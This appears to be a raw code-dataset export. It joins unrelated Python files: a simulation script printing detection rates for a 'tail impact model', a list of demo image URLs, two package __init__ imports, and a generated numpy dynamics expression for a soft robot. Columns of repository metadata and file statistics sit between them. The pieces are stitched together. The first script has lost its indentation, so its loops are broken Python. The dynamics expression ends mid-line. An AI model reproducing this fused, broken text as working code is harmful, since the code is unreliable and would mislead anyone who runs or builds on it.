print(f'# tail impact model (T={default_T}, q={default_q}, r={default_r}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# N\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ### ... by impact order
vals = [1, 2, 4, 8, 16, 32]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='tail', param_T=default_T,
param_N=default_N, param_q=val, param_r=default_r,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# tail impact model (T={default_T}, N={default_N}, r={default_r}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# q\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ### ... by degrees of freedom
vals = [2.5, 3., 3.5, 4., 4.5, 5., 5.5, 6.]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='tail', param_T=default_T,
param_N=default_N, param_q=default_q, param_r=val,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# tail impact model (T={default_T}, N={default_N}, q={default_q}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# r\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
| 43.55611
| 211
| 0.623612
| 2,483
| 17,466
| 4.176802
| 0.089811
| 0.030662
| 0.046379
| 0.048211
| 0.788352
| 0.768682
| 0.760968
| 0.744383
| 0.723652
| 0.713528
| 0
| 0.014813
| 0.246307
| 17,466
| 400
| 212
| 43.665
| 0.773017
| 0.12407
| 0
| 0.726592
| 0
| 0.048689
| 0.20127
| 0.079727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022472
| false
| 0
| 0.014981
| 0
| 0.059925
| 0.183521
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
961e540312696cbd519e78f2e01a4ce3945b4db3
| 118
|
py
|
Python
|
tests/factory/data_list.py
|
easydatapy/easydata
|
5e76bf7fc9f368065a82ccc99fca54b17f7e91bd
|
[
"BSD-3-Clause"
] | 6
|
2020-09-06T19:06:01.000Z
|
2020-09-09T23:19:21.000Z
|
tests/factory/data_list.py
|
sitegroove/easydata
|
0e347990027b9f6cc06a1072511197f1adb50e5c
|
[
"BSD-3-Clause"
] | null | null | null |
tests/factory/data_list.py
|
sitegroove/easydata
|
0e347990027b9f6cc06a1072511197f1adb50e5c
|
[
"BSD-3-Clause"
] | 1
|
2021-07-22T17:59:20.000Z
|
2021-07-22T17:59:20.000Z
|
images = [
"https://demo.com/imgs/1.jpg",
"https://demo.com/imgs/2.jpg",
"https://demo.com/imgs/3.jpg",
]
| 19.666667
| 34
| 0.559322
| 19
| 118
| 3.473684
| 0.473684
| 0.409091
| 0.545455
| 0.727273
| 0.575758
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.161017
| 118
| 5
| 35
| 23.6
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0.686441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
82808848e57ade04710e5e5cf62fffc935034f63
| 37
|
py
|
Python
|
input_pipeline/__init__.py
|
TropComplique/wing-loss
|
d7335610d26cf805bf5a20ae0d70df5de85d1521
|
[
"MIT"
] | 73
|
2018-06-22T12:38:16.000Z
|
2022-01-25T14:17:16.000Z
|
input_pipeline/__init__.py
|
TropComplique/wing-loss
|
d7335610d26cf805bf5a20ae0d70df5de85d1521
|
[
"MIT"
] | 16
|
2018-06-25T05:09:27.000Z
|
2019-07-23T06:29:10.000Z
|
input_pipeline/__init__.py
|
TropComplique/wing-loss
|
d7335610d26cf805bf5a20ae0d70df5de85d1521
|
[
"MIT"
] | 17
|
2018-08-11T13:36:45.000Z
|
2022-01-20T08:34:00.000Z
|
from .input_pipeline import Pipeline
| 18.5
| 36
| 0.864865
| 5
| 37
| 6.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
82e1109a23bb4191d5e0935acab59d88b08a8dcd
| 39
|
py
|
Python
|
classicML/framework/__init__.py
|
sun1638650145/classicML
|
7e0c2155bccb6e491a150ee689d3786526b74565
|
[
"Apache-2.0"
] | 12
|
2020-05-10T12:11:06.000Z
|
2021-10-31T13:23:55.000Z
|
classicML/framework/__init__.py
|
sun1638650145/classicML
|
7e0c2155bccb6e491a150ee689d3786526b74565
|
[
"Apache-2.0"
] | null | null | null |
classicML/framework/__init__.py
|
sun1638650145/classicML
|
7e0c2155bccb6e491a150ee689d3786526b74565
|
[
"Apache-2.0"
] | 2
|
2021-01-17T06:22:05.000Z
|
2021-01-18T14:32:51.000Z
|
from classicML.framework import dtypes
| 19.5
| 38
| 0.871795
| 5
| 39
| 6.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.971429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7d78140f8b54ab8c3287ebf3089138e4854aa0af
| 19
|
py
|
Python
|
Driver/__init__.py
|
Lagikna/QuLab-drivers
|
badf3f975e38fbf79c5bdd4be16ff9e02c26e74f
|
[
"MIT"
] | 16
|
2018-03-16T12:08:31.000Z
|
2022-03-20T08:53:35.000Z
|
Driver/__init__.py
|
Lagikna/QuLab-drivers
|
badf3f975e38fbf79c5bdd4be16ff9e02c26e74f
|
[
"MIT"
] | 148
|
2018-03-18T09:33:18.000Z
|
2022-03-21T16:00:15.000Z
|
qulab/Driver/__init__.py
|
feihoo87/QuLab
|
cc16f4777e5523fca327f7f0a9725fd13f9b057f
|
[
"MIT"
] | 14
|
2018-03-18T08:00:12.000Z
|
2020-10-21T12:39:42.000Z
|
from .Base import *
| 19
| 19
| 0.736842
| 3
| 19
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 19
| 1
| 19
| 19
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7daa7c4a27c52bdb30c76be2ba495e74e8d066ed
| 38
|
py
|
Python
|
forge_sdk/protos/__init__.py
|
ArcBlock/forge-python-sdk
|
4e72d75d3c06b16554d660860708732c83b5f8b2
|
[
"Apache-2.0"
] | 9
|
2019-05-08T01:30:22.000Z
|
2020-05-08T22:11:40.000Z
|
forge_sdk/protos/__init__.py
|
ArcBlock/forge-python-sdk
|
4e72d75d3c06b16554d660860708732c83b5f8b2
|
[
"Apache-2.0"
] | 22
|
2019-05-14T18:36:17.000Z
|
2019-12-24T10:09:42.000Z
|
forge_sdk/protos/__init__.py
|
ArcBlock/forge-python-sdk
|
4e72d75d3c06b16554d660860708732c83b5f8b2
|
[
"Apache-2.0"
] | null | null | null |
from forge_sdk.protos.protos import *
| 19
| 37
| 0.815789
| 6
| 38
| 5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 38
| 1
| 38
| 38
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7daed7254b206996a5970df83e419942d9e96b0a
| 174,759
|
py
|
Python
|
o/soft_robot/derivation_of_dynamics/derived/ikko_dake/eqs/numpy_style/G1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/derivation_of_dynamics/derived/ikko_dake/eqs/numpy_style/G1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/derivation_of_dynamics/derived/ikko_dake/eqs/numpy_style/G1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
import numpy
def f(q, q_dot, xi):
l1, l2, l3 = q[0,0], q[1,0], q[2,0]
l1_dot, l2_dot, l3_dot = q_dot[0,0], q_dot[1,0], q_dot[2,0]
return 2.01913979602267e+28*l1**28 - 2.7258387246306e+29*l1**27*l2 - 2.1200967858238e+29*l1**27*l3 + 1.2114838776136e+28*l1**27 + 1.8525607628508e+30*l1**26*l2**2 + 2.47344625012777e+30*l1**26*l2*l3 - 1.77179517100989e+29*l1**26*l2 + 1.12567043628264e+30*l1**26*l3**2 - 1.49921129854683e+29*l1**26*l3 - 1.788718987827e+26*l1**26 - 8.34914305655373e+30*l1**25*l2**3 - 1.43207490032908e+31*l1**25*l2**2*l3 + 1.31976024917532e+30*l1**25*l2**2 - 1.12768957607866e+31*l1**25*l2*l3**2 + 1.96714694627508e+30*l1**25*l2*l3 + 1.87956337736624e+27*l1**25*l2 - 3.85150916091324e+30*l1**25*l3**3 + 9.65401214973338e+29*l1**25*l3**2 + 1.75956427676557e+27*l1**25*l3 - 1.51731257132758e+26*l1**25 + 2.7702598001431e+31*l1**24*l2**4 + 5.38353148114544e+31*l1**24*l2**3*l3 - 6.61243043949973e+30*l1**24*l2**3 + 5.44006739543407e+31*l1**24*l2**2*l3**2 - 1.31567149108837e+31*l1**24*l2**2*l3 - 8.14930511772943e+27*l1**24*l2**2 + 3.23011888868726e+31*l1**24*l2*l3**3 - 1.14326219175548e+31*l1**24*l2*l3**2 - 1.78662041200663e+28*l1**24*l2*l3 + 1.92364051179463e+27*l1**24*l2 + 8.93974144689036e+30*l1**24*l3**4 - 4.23413615225953e+30*l1**24*l3**3 - 6.829315011122e+27*l1**24*l3**2 + 1.86964091652432e+27*l1**24*l3 - 1.61579199302433e+25*l1**24 - 7.10434337230576e+31*l1**23*l2**5 - 1.43823327670695e+32*l1**23*l2**4*l3 + 2.48732783622542e+31*l1**23*l2**4 - 1.61026398732808e+32*l1**23*l2**3*l3**2 + 5.92052170989767e+31*l1**23*l2**3*l3 + 1.17422007240064e+28*l1**23*l2**3 - 1.20683985608275e+32*l1**23*l2**2*l3**3 + 6.90727532821394e+31*l1**23*l2**2*l3**2 + 8.25408954363249e+28*l1**23*l2**2*l3 - 1.16723737825743e+28*l1**23*l2**2 - 5.77776852631886e+31*l1**23*l2*l3**4 + 4.54124731523458e+31*l1**23*l2*l3**3 + 5.57781382780633e+28*l1**23*l2*l3**2 - 2.28226247179224e+28*l1**23*l2*l3 + 2.04390872264809e+26*l1**23*l2 - 1.26196237251417e+31*l1**23*l3**5 + 1.40516986254707e+31*l1**23*l3**4 + 1.1543188131109e+28*l1**23*l3**3 - 1.10243786393307e+28*l1**23*l3**2 + 1.29327668615959e+26*l1**23*l3 - 8.11073061676064e+24*l1**23 + 1.43414451862e+32*l1**22*l2**6 + 2.77470190769435e+32*l1**22*l2**5*l3 - 7.44063110533333e+31*l1**22*l2**5 + 2.93446634405464e+32*l1**22*l2**4*l3**2 - 2.00053847065181e+32*l1**22*l2**4*l3 + 5.91859296379042e+28*l1**22*l2**4 + 2.19379538837863e+32*l1**22*l2**3*l3**3 - 2.8075230250787e+32*l1**22*l2**3*l3**2 - 2.15950142006153e+29*l1**22*l2**3*l3 + 4.36296289796417e+28*l1**22*l2**3 + 1.14722475360518e+32*l1**22*l2**2*l3**4 - 2.48805472655199e+32*l1**22*l2**2*l3**3 - 1.66709384307557e+29*l1**22*l2**2*l3**2 + 1.37575710060284e+29*l1**22*l2**2*l3 - 1.34334713715882e+27*l1**22*l2**2 + 3.75963830019421e+31*l1**22*l2*l3**5 - 1.36718984298389e+32*l1**22*l2*l3**4 - 3.89717501582841e+28*l1**22*l2*l3**3 + 1.24884474195823e+29*l1**22*l2*l3**2 - 1.27987830168137e+27*l1**22*l2*l3 + 1.10162622913739e+26*l1**22*l2 + 6.71363982177546e+29*l1**22*l3**6 - 3.72940168174877e+31*l1**22*l3**5 + 1.4856402735018e+28*l1**22*l3**4 + 4.28920781695941e+28*l1**22*l3**3 - 5.92715100670318e+26*l1**22*l3**2 + 7.6384181271756e+25*l1**22*l3 + 7.42187408081036e+23*l1**22 - 2.25325905537149e+32*l1**21*l2**7 - 3.56645710020974e+32*l1**21*l2**6*l3 + 1.83178633827447e+32*l1**21*l2**6 - 1.89344834372026e+32*l1**21*l2**5*l3**2 + 5.37867040208651e+32*l1**21*l2**5*l3 - 4.60280705102438e+29*l1**21*l2**5 + 6.56876654141075e+31*l1**21*l2**4*l3**3 + 8.55924717195361e+32*l1**21*l2**4*l3**2 + 3.08135683465226e+29*l1**21*l2**4*l3 - 1.0367660850196e+29*l1**21*l2**4 + 2.57086974528586e+32*l1**21*l2**3*l3**4 + 9.17617262130563e+32*l1**21*l2**3*l3**3 - 5.79711500103451e+28*l1**21*l2**3*l3**2 - 5.45145403544273e+29*l1**21*l2**3*l3 + 6.00006345241668e+27*l1**21*l2**3 + 2.47925127704133e+32*l1**21*l2**2*l3**5 + 6.80217153005673e+32*l1**21*l2**2*l3**4 - 2.65303821393609e+29*l1**21*l2**2*l3**3 - 6.95614705346718e+29*l1**21*l2**2*l3**2 + 6.289386107026e+27*l1**21*l2**2*l3 - 7.89609082982699e+26*l1**21*l2**2 + 1.45590074992214e+32*l1**21*l2*l3**6 + 3.29476669710642e+32*l1**21*l2*l3**5 - 4.06464030996338e+29*l1**21*l2*l3**4 - 4.52076340538223e+29*l1**21*l2*l3**3 + 4.97474341767958e+27*l1**21*l2*l3**2 - 8.4435953813685e+26*l1**21*l2*l3 - 8.10542803441228e+24*l1**21*l2 + 5.50266072911077e+31*l1**21*l3**7 + 8.18319500456811e+31*l1**21*l3**6 - 1.47925158899093e+29*l1**21*l3**5 - 1.22887344798211e+29*l1**21*l3**4 + 1.75933798808716e+27*l1**21*l3**3 - 4.18046224920891e+26*l1**21*l3**2 - 5.29256635947027e+24*l1**21*l3 + 4.39519287585034e+23*l1**21 + 2.56309605707117e+32*l1**20*l2**8 + 1.5319718417373e+32*l1**20*l2**7*l3 - 3.79225497967421e+32*l1**20*l2**7 - 7.65319604735962e+32*l1**20*l2**6*l3**2 - 1.19217282460444e+33*l1**20*l2**6*l3 + 1.74935319132634e+30*l1**20*l2**6 - 1.7463590574295e+33*l1**20*l2**5*l3**3 - 2.07108544837752e+33*l1**20*l2**5*l3**2 - 5.80732267100601e+28*l1**20*l2**5*l3 + 1.15822667114523e+29*l1**20*l2**5 - 2.39468465453441e+33*l1**20*l2**4*l3**4 - 2.53966393973833e+33*l1**20*l2**4*l3**3 + 2.23674320028543e+30*l1**20*l2**4*l3**2 + 1.59809544296855e+30*l1**20*l2**4*l3 - 2.00642268915256e+28*l1**20*l2**4 - 2.2011198179887e+33*l1**20*l2**3*l3**5 - 2.27782668644713e+33*l1**20*l2**3*l3**4 + 3.04088678586467e+30*l1**20*l2**3*l3**3 + 2.52783585127777e+30*l1**20*l2**3*l3**2 - 1.9817031305127e+28*l1**20*l2**3*l3 + 3.88910904442813e+27*l1**20*l2**3 - 1.4229736276985e+33*l1**20*l2**2*l3**6 - 1.49021603075555e+33*l1**20*l2**2*l3**5 + 3.01462511650003e+30*l1**20*l2**2*l3**4 + 2.34146708614925e+30*l1**20*l2**2*l3**3 - 1.99314618015748e+28*l1**20*l2**2*l3**2 + 4.91446360935232e+27*l1**20*l2**2*l3 + 4.54445989407002e+25*l1**20*l2**2 - 6.55377442842527e+32*l1**20*l2*l3**7 - 6.5642966706873e+32*l1**20*l2*l3**6 + 2.10485520991934e+30*l1**20*l2*l3**5 + 1.20266724475104e+30*l1**20*l2*l3**4 - 1.27548704091858e+28*l1**20*l2*l3**3 + 3.95131154108462e+27*l1**20*l2*l3**2 + 4.48366069542838e+25*l1**20*l2*l3 - 5.17322758304606e+24*l1**20*l2 - 1.88956149961291e+32*l1**20*l3**8 - 1.51720183412939e+32*l1**20*l3**7 + 4.73143742496136e+29*l1**20*l3**6 + 2.75593399202279e+29*l1**20*l3**5 - 3.36577395613108e+27*l1**20*l3**4 + 1.60921972741803e+27*l1**20*l3**3 + 1.96313851098304e+25*l1**20*l3**2 - 4.05667745623965e+24*l1**20*l3 - 1.54340078609811e+22*l1**20 - 1.43035863150246e+32*l1**19*l2**9 + 6.22450320618888e+32*l1**19*l2**8*l3 + 6.69197949961354e+32*l1**19*l2**8 + 3.41464807464578e+33*l1**19*l2**7*l3**2 + 2.23092635965759e+33*l1**19*l2**7*l3 - 4.69495199419617e+30*l1**19*l2**7 + 6.27569849571704e+33*l1**19*l2**6*l3**3 + 4.11348598724284e+33*l1**19*l2**6*l3**2 - 5.82834962608418e+29*l1**19*l2**6*l3 + 2.30934735681788e+29*l1**19*l2**6 + 8.61868812362378e+33*l1**19*l2**5*l3**4 + 5.58026434803111e+33*l1**19*l2**5*l3**3 - 1.00109686996781e+31*l1**19*l2**5*l3**2 - 3.70206175638119e+30*l1**19*l2**5*l3 + 5.27253345486586e+28*l1**19*l2**5 + 8.5907028460509e+33*l1**19*l2**4*l3**5 + 5.72298926365277e+33*l1**19*l2**4*l3**4 - 1.31728958107338e+31*l1**19*l2**4*l3**3 - 6.72580003873251e+30*l1**19*l2**4*l3**2 + 4.06172846118925e+28*l1**19*l2**4*l3 - 1.4556087071299e+28*l1**19*l2**4 + 6.64650342355761e+33*l1**19*l2**3*l3**6 + 4.53291533486629e+33*l1**19*l2**3*l3**5 - 1.51723808244926e+31*l1**19*l2**3*l3**4 - 7.8845056235418e+30*l1**19*l2**3*l3**3 + 5.17429684829294e+28*l1**19*l2**3*l3**2 - 1.95578326033666e+28*l1**19*l2**3*l3 - 1.7153555546514e+26*l1**19*l2**3 + 3.78945089928248e+33*l1**19*l2**2*l3**7 + 2.70092910175202e+33*l1**19*l2**2*l3**6 - 1.06803469220911e+31*l1**19*l2**2*l3**5 - 5.79395621308992e+30*l1**19*l2**2*l3**4 + 3.71159164420733e+28*l1**19*l2**2*l3**3 - 1.98078871884733e+28*l1**19*l2**2*l3**2 - 1.8185688150654e+26*l1**19*l2**2*l3 + 3.18642646368067e+25*l1**19*l2**2 + 1.61093030346077e+33*l1**19*l2*l3**8 + 1.10381930541008e+33*l1**19*l2*l3**7 - 6.22616449655432e+30*l1**19*l2*l3**6 - 2.49308649376822e+30*l1**19*l2*l3**5 + 2.33216958000335e+28*l1**19*l2*l3**4 - 1.31368188149152e+28*l1**19*l2*l3**3 - 1.34055780078606e+26*l1**19*l2*l3**2 + 3.97360223873078e+25*l1**19*l2*l3 + 1.48884991110744e+23*l1**19*l2 + 4.19668110904331e+32*l1**19*l3**9 + 2.41323045356088e+32*l1**19*l3**8 - 9.41558858461735e+29*l1**19*l3**7 - 5.03130248379561e+29*l1**19*l3**6 + 2.44956475336916e+27*l1**19*l3**5 - 4.76189393336135e+27*l1**19*l3**4 - 4.01933887754617e+25*l1**19*l3**3 + 2.06987633687426e+25*l1**19*l3**2 + 9.14656526416549e+22*l1**19*l3 - 1.02494270200835e+22*l1**19 - 1.92454309657901e+32*l1**18*l2**10 - 2.11921846001253e+33*l1**18*l2**9*l3 - 1.01421644346693e+33*l1**18*l2**9 - 8.33283850270085e+33*l1**18*l2**8*l3**2 - 3.58681305806334e+33*l1**18*l2**8*l3 + 9.74218272128487e+30*l1**18*l2**8 - 1.46197533199848e+34*l1**18*l2**7*l3**3 - 6.84654818449371e+33*l1**18*l2**7*l3**2 + 2.952830685286e+29*l1**18*l2**7*l3 - 1.64570145763795e+30*l1**18*l2**7 - 2.10196642481037e+34*l1**18*l2**6*l3**4 - 1.00767988220527e+34*l1**18*l2**6*l3**3 + 2.82772754899688e+31*l1**18*l2**6*l3**2 + 7.13215022551169e+30*l1**18*l2**6*l3 - 1.11428877748833e+29*l1**18*l2**6 - 2.27154943321377e+34*l1**18*l2**5*l3**5 - 1.13910574200688e+34*l1**18*l2**5*l3**4 + 3.7455219693771e+31*l1**18*l2**5*l3**3 + 1.37731360090863e+31*l1**18*l2**5*l3**2 - 4.21691108130984e+28*l1**18*l2**5*l3 + 4.3655846867763e+28*l1**18*l2**5 - 1.9781315715504e+34*l1**18*l2**4*l3**6 - 1.03563017818117e+34*l1**18*l2**4*l3**5 + 4.84880753118198e+31*l1**18*l2**4*l3**4 + 1.96415068968288e+31*l1**18*l2**4*l3**3 - 8.61533600606795e+28*l1**18*l2**4*l3**2 + 5.8286420015866e+28*l1**18*l2**4*l3 + 4.80119379601176e+26*l1**18*l2**4 - 1.38321676511482e+34*l1**18*l2**3*l3**7 - 7.45003070586876e+33*l1**18*l2**3*l3**6 + 4.2611113303609e+31*l1**18*l2**3*l3**5 + 1.78098948149948e+31*l1**18*l2**3*l3**4 - 5.89974987548677e+28*l1**18*l2**3*l3**3 + 6.92265697002505e+28*l1**18*l2**3*l3**2 + 4.43712746458854e+26*l1**18*l2**3*l3 - 1.34247793346114e+26*l1**18*l2**3 - 7.26140216133938e+33*l1**18*l2**2*l3**8 - 4.13822297366886e+33*l1**18*l2**2*l3**7 + 2.51056494023117e+31*l1**18*l2**2*l3**6 + 1.13310967207448e+31*l1**18*l2**2*l3**5 - 3.83468415446739e+28*l1**18*l2**2*l3**4 + 5.62233824934139e+28*l1**18*l2**2*l3**3 + 3.86479094420562e+26*l1**18*l2**2*l3**2 - 2.02677648060985e+26*l1**18*l2**2*l3 - 7.26642958513827e+23*l1**18*l2**2 - 2.96277468399488e+33*l1**18*l2*l3**9 - 1.58701510693172e+33*l1**18*l2*l3**8 + 1.36482053820674e+31*l1**18*l2*l3**7 + 4.11774165668441e+30*l1**18*l2*l3**6 - 2.75661099234037e+28*l1**18*l2*l3**5 + 3.42881981241404e+28*l1**18*l2*l3**4 + 2.02890400620932e+26*l1**18*l2*l3**3 - 1.7481456461844e+26*l1**18*l2*l3**2 - 6.54006173639123e+23*l1**18*l2*l3 + 1.08228411065603e+23*l1**18*l2 - 7.23175109343478e+32*l1**18*l3**10 - 3.33124750537106e+32*l1**18*l3**9 + 1.17800198067478e+30*l1**18*l3**8 + 7.77390437503894e+29*l1**18*l3**7 + 9.3235714037261e+27*l1**18*l3**6 + 1.12375573219451e+28*l1**18*l3**5 + 1.88282524239491e+25*l1**18*l3**4 - 7.28206464625565e+25*l1**18*l3**3 - 2.53551605556211e+23*l1**18*l3**2 + 8.65107023159846e+22*l1**18*l3 + 1.87958524288171e+20*l1**18 + 7.41589664283206e+32*l1**17*l2**11 + 4.12705107317747e+33*l1**17*l2**10*l3 + 1.32305397096758e+33*l1**17*l2**10 + 1.51888983499887e+34*l1**17*l2**9*l3**2 + 5.02535627272898e+33*l1**17*l2**9*l3 - 1.6135335085975e+31*l1**17*l2**9 + 2.59130344002161e+34*l1**17*l2**8*l3**3 + 9.66721429528967e+33*l1**17*l2**8*l3**2 + 4.55664683361728e+30*l1**17*l2**8*l3 + 5.20468800644549e+30*l1**17*l2**8 + 3.94629061164824e+34*l1**17*l2**7*l3**4 + 1.53000509861898e+34*l1**17*l2**7*l3**3 - 6.09337276648293e+31*l1**17*l2**7*l3**2 - 1.20148778140808e+31*l1**17*l2**7*l3 + 1.90534922734384e+29*l1**17*l2**7 + 4.51833966946376e+34*l1**17*l2**6*l3**5 + 1.85705054734048e+34*l1**17*l2**6*l3**4 - 7.66789099003717e+31*l1**17*l2**6*l3**3 - 2.21372796803223e+31*l1**17*l2**6*l3**2 - 5.00745636668961e+28*l1**17*l2**6*l3 - 1.0830748560078e+29*l1**17*l2**6 + 4.37666420175108e+34*l1**17*l2**5*l3**6 + 1.87232001441618e+34*l1**17*l2**5*l3**5 - 1.17470551594533e+32*l1**17*l2**5*l3**4 - 3.8364256693873e+31*l1**17*l2**5*l3**3 + 7.65445882683899e+28*l1**17*l2**5*l3**2 - 1.35960330015055e+29*l1**17*l2**5*l3 - 1.04206887780218e+27*l1**17*l2**5 + 3.43341042641537e+34*l1**17*l2**4*l3**7 + 1.54662385586337e+34*l1**17*l2**4*l3**6 - 1.10995133085869e+32*l1**17*l2**4*l3**5 - 4.04314601683884e+31*l1**17*l2**4*l3**4 - 2.10473869835868e+28*l1**17*l2**4*l3**3 - 1.84676955105156e+29*l1**17*l2**4*l3**2 - 5.71332658263405e+26*l1**17*l2**4*l3 + 4.29070767832032e+26*l1**17*l2**4 + 2.25548010914712e+34*l1**17*l2**3*l3**8 + 1.03193712101575e+34*l1**17*l2**3*l3**7 - 8.91370880749926e+31*l1**17*l2**3*l3**6 - 3.17704531992704e+31*l1**17*l2**3*l3**5 + 4.66366794500023e+27*l1**17*l2**3*l3**4 - 1.69123478061295e+29*l1**17*l2**3*l3**3 - 5.16825371929779e+26*l1**17*l2**3*l3**2 + 7.0017720890193e+26*l1**17*l2**3*l3 + 2.34998254702356e+24*l1**17*l2**3 + 1.10350835788149e+34*l1**17*l2**2*l3**9 + 5.44123748694587e+33*l1**17*l2**2*l3**8 - 4.36015498238991e+31*l1**17*l2**2*l3**7 - 1.81080635625993e+31*l1**17*l2**2*l3**6 - 3.29663881053629e+28*l1**17*l2**2*l3**5 - 1.26162612674392e+29*l1**17*l2**2*l3**4 - 8.2420263046996e+25*l1**17*l2**2*l3**3 + 7.73833019195967e+26*l1**17*l2**2*l3**2 + 2.05928573919761e+24*l1**17*l2**2*l3 - 5.9555098094709e+23*l1**17*l2**2 + 4.43588860067812e+33*l1**17*l2*l3**10 + 1.96486632787548e+33*l1**17*l2*l3**9 - 2.43203630697625e+31*l1**17*l2*l3**8 - 5.41474609930297e+30*l1**17*l2*l3**7 + 1.26066056084997e+28*l1**17*l2*l3**6 - 7.2972468177149e+28*l1**17*l2*l3**5 + 1.65345091404052e+25*l1**17*l2*l3**4 + 5.3299870824666e+26*l1**17*l2*l3**3 + 1.30340503259894e+24*l1**17*l2*l3**2 - 7.57009437286671e+23*l1**17*l2*l3 - 1.56961293504921e+21*l1**17*l2 + 1.02444086260904e+33*l1**17*l3**11 + 4.03137918179243e+32*l1**17*l3**10 - 4.48026747650675e+29*l1**17*l3**9 - 1.07228522197089e+30*l1**17*l3**8 - 4.63002167310912e+28*l1**17*l3**7 - 2.15505939363103e+28*l1**17*l3**6 + 1.88169032138821e+26*l1**17*l3**5 + 1.94443232019839e+26*l1**17*l3**4 + 1.97748839803121e+23*l1**17*l3**3 - 4.00091602200526e+23*l1**17*l3**2 - 8.49656519669635e+20*l1**17*l3 + 1.44597597370235e+20*l1**17 - 1.3678965419125e+33*l1**16*l2**12 - 6.05637953107305e+33*l1**16*l2**11*l3 - 1.47961706118128e+33*l1**16*l2**11 - 2.24902794792893e+34*l1**16*l2**10*l3**2 - 6.21612983345477e+33*l1**16*l2**10*l3 + 2.13602663121754e+31*l1**16*l2**10 - 